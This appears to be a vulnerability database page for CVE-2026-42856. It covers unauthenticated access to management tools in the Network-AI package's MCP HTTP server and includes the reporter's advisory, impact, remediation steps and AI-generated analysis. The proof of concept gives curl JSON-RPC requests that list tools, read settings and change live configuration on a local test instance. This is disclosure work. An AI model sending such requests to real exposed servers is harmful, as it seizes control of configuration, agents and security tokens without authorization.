Network-AI CVE-2026-42856
HIGHSeverity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
4DescriptionGitHub Advisory
Security Advisory: Missing Authentication for Critical Function in Jovancoding/Network-AI
| Field | Value |
|---|---|
| Project | Jovancoding/Network-AI |
| Repository | https://github.com/Jovancoding/Network-AI |
| Affected commit | c344f2053eb0d49395988f803bf92f2a86b2a0d0 |
| Affected tested version | 5.1.2 |
| Vulnerability type | CWE-306: Missing Authentication for Critical Function |
| Severity | High |
| Authentication required | None |
| Default network exposure | Bind address 0.0.0.0 |
| Reporter validation date | 2026-04-21 |
Summary
The MCP HTTP transport accepts JSON-RPC tools/call requests with no authentication, session, origin, or token check, and dispatches them directly to the orchestrator's tool registry. The default bind address is 0.0.0.0. As a result, any party with network reachability to the service can enumerate and invoke privileged management tools - including reading and mutating the live orchestrator configuration, listing registered agents, dispatching agents, creating/revoking security tokens, and adjusting global budget ceilings.
Affected Code
bin/mcp-server.ts:75- server binds to0.0.0.0by default.lib/mcp-transport-sse.ts:155-handleRPC()dispatchestools/calldirectly to the provider'scall(toolName, toolArgs).lib/mcp-transport-sse.ts:379-_handlePost()parses the JSON-RPC body and callsthis._bridge.handleRPC(rpc)with no auth check.lib/mcp-tools-control.ts:80-config_getexposes live runtime configuration.lib/mcp-tools-control.ts:197-agent_listexposes registered agents.lib/mcp-tools-control.ts:231-config_setmutates runtime configuration in place:this._config[key] = parsed.
Proof of Concept
The PoC was executed against a local Docker build of the affected commit, bound to http://localhost:13001. No authentication header was sent. All inner-JSON excerpts below are decoded from the JSON-RPC result.content[0].text field for readability; the raw wire transcripts (which contain the literal escaped JSON-RPC envelope) are in evidence/.
Step 1 - list exposed tools (unauthenticated)
curl http://localhost:13001/toolsHTTP/1.1 200 OK - body returned 22 tools. Privileged tools observed in the inventory include:
config_get,config_set- read and mutate live orchestrator configurationagent_list,agent_spawn,agent_stop- enumerate, dispatch, and stop agentstoken_create,token_revoke- mint and revoke security tokensbudget_set_ceiling- adjust the global token budget ceilingfsm_transition- drive finite-state-machine transitionsblackboard_write,blackboard_delete- mutate the shared blackboard
Full transcript: evidence/01_get_tools.txt.
Step 2 - read live configuration (unauthenticated)
curl http://localhost:13001/mcp \
-H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"config_get","arguments":{}}}'HTTP/1.1 200 OK - decoded inner JSON:
{
"ok": true,
"tool": "config_get",
"data": {
"blackboardPath": "./swarm-blackboard.md",
"maxParallelAgents": null,
"defaultTimeout": 30000,
"enableTracing": true,
"grantTokenTTL": 300000,
"maxBlackboardValueSize": 1048576,
"auditLogPath": "./data/audit_log.jsonl",
"trustConfigPath": "./data/trust_levels.json"
}
}Full transcript: evidence/02_config_get_before.txt.
Step 3 - mutate live configuration (unauthenticated)
curl http://localhost:13001/mcp \
-H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"config_set","arguments":{"key":"defaultTimeout","value":"12345"}}}'HTTP/1.1 200 OK - decoded inner JSON:
{
"ok": true,
"tool": "config_set",
"data": {
"key": "defaultTimeout",
"previous": 30000,
"current": 12345,
"applied": true
}
}Full transcript: evidence/03_config_set.txt.
Step 4 - confirm mutation persisted (unauthenticated)
curl http://localhost:13001/mcp \
-H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","id":3,"method":"tools/call","params":{"name":"config_get","arguments":{}}}'HTTP/1.1 200 OK - decoded inner JSON (relevant key only):
{
"ok": true,
"tool": "config_get",
"data": {
"defaultTimeout": 12345
}
}This proves the runtime change applied by step 3 is observable on the next read. Full transcript: evidence/04_config_get_after.txt.
Step 5 - enumerate registered agents (unauthenticated)
curl http://localhost:13001/mcp \
-H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","id":4,"method":"tools/call","params":{"name":"agent_list","arguments":{}}}'HTTP/1.1 200 OK - decoded inner JSON:
{
"ok": true,
"tool": "agent_list",
"data": {
"agents": [],
"count": 0
}
}This is a privileged management read; the empty array reflects the test environment, not a control. Full transcript: evidence/05_agent_list.txt.
Cleanup - runtime state restored
After the PoC, defaultTimeout was restored to 30000 via the same unauthenticated config_set (previous":12345,"current":30000,"applied":true). All testing was performed against a local Docker container only.
Impact
- Unauthenticated network access enables full enumeration and invocation of the orchestrator's management functionality.
- An attacker can change runtime configuration (e.g.,
defaultTimeout,enableTracing), dispatch or stop agents, mutate the shared blackboard, mint or revoke security tokens, and adjust global budget ceilings. - The default
0.0.0.0bind, combined with the absence of any auth gate, increases the likelihood of accidental exposure on any host with a routable interface.
Suggested Remediation
- Enforce authentication inside
_handlePost()before reachinghandleRPC(). At a minimum, require a shared secret / bearer token loaded from configuration; reject any request that does not present it. - Default the bind address to
127.0.0.1. Require an explicit configuration opt-in to bind to non-loopback interfaces, and warn on startup when binding outside loopback without an authentication mechanism configured. - For tool-level defense in depth, gate state-mutating tools (
config_set,agent_spawn,agent_stop,token_create,token_revoke,budget_set_ceiling,fsm_transition,blackboard_write,blackboard_delete) behind an explicit authorization check tied to a verified caller identity.
Verification Environment
- Local Docker container only; no third-party deployment was tested.
- Local build required a minimal Dockerfile fix; the application code path under test was not modified.
- Runtime state (
defaultTimeout) was restored to default after the PoC.
Attached Evidence
Files in evidence/ are raw curl -i transcripts captured during the verification sequence above. They are provided as supplementary backup; the key excerpts are already inlined in this report.
| File | Purpose |
|---|---|
| 01_get_tools.txt | Step 1 - full GET /tools request and 22-tool inventory response |
| 02_config_get_before.txt | Step 2 - full config_get request and live configuration response |
| 03_config_set.txt | Step 3 - full config_set request mutating defaultTimeout |
| 04_config_get_after.txt | Step 4 - full config_get request showing the mutation persisted |
| 05_agent_list.txt | Step 5 - full agent_list request and response |
AnalysisAI
Unauthenticated remote access to privileged management functions in Network-AI npm package (versions ≤5.1.2) allows attackers to read and mutate orchestrator configuration, enumerate and control agents, create or revoke security tokens, and adjust global budget ceilings. The MCP HTTP transport binds to 0.0.0.0 by default and accepts JSON-RPC tool invocation requests without authentication, session validation, or origin checks. Public exploit code exists demonstrating enumeration of 22 privileged tools and successful mutation of runtime configuration parameters via simple HTTP POST requests. Vendor-released patch: version 5.1.3 available per GitHub advisory GHSA-fj4g-2p96-q6m3.
Technical ContextAI
Network-AI is an npm package (pkg:npm/network-ai) implementing an AI agent orchestration framework with an MCP (Model Context Protocol) HTTP transport layer that accepts JSON-RPC 2.0 requests. The vulnerability stems from CWE-306 (Missing Authentication for Critical Function) where the SSE transport handler in lib/mcp-transport-sse.ts processes tools/call RPC methods without any authentication gate. The server binds to 0.0.0.0:13001 by default, exposing the JSON-RPC endpoint to any network-reachable client. The _handlePost() method at line 379 parses incoming JSON-RPC payloads and directly invokes handleRPC() which dispatches to the tool registry without validating caller identity, bearer tokens, session state, or request origin. Affected modules include mcp-server.ts (default bind configuration), mcp-transport-sse.ts (RPC dispatch path), and mcp-tools-control.ts (privileged tool implementations including config_set, agent_spawn, token_create, and budget_set_ceiling). The architecture conflates network reachability with authorization, treating any TCP client as a trusted management console.
RemediationAI
Upgrade immediately to Network-AI version 5.1.3 or later, as documented in the GitHub advisory GHSA-fj4g-2p96-q6m3 (https://github.com/Jovancoding/Network-AI/security/advisories/GHSA-fj4g-2p96-q6m3). The patch addresses the root authentication bypass in the MCP transport layer. For deployments that cannot immediately upgrade, implement these compensating controls with noted trade-offs: (1) Change the bind address from 0.0.0.0 to 127.0.0.1 in bin/mcp-server.ts line 75 to restrict access to localhost only - this breaks legitimate remote management and requires SSH tunneling or sidecar access patterns. (2) Deploy a reverse proxy (nginx, Envoy) in front of the MCP endpoint with mandatory bearer token authentication before the /mcp path - adds operational complexity and latency but provides immediate auth gate. (3) Use network segmentation to isolate the orchestrator on a management VLAN with firewall rules blocking port 13001 from untrusted networks - effective but requires infrastructure changes and may conflict with microservice mesh patterns. (4) If running in Docker/Kubernetes, do not publish port 13001 to the host network and restrict access via internal service networking with NetworkPolicy objects - limits deployment flexibility for hybrid environments. All workarounds trade functionality or operational overhead for security; version 5.1.3 is the only full remediation. Verify the patch by confirming that _handlePost() method now includes an authentication check before calling handleRPC().
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-fj4g-2p96-q6m3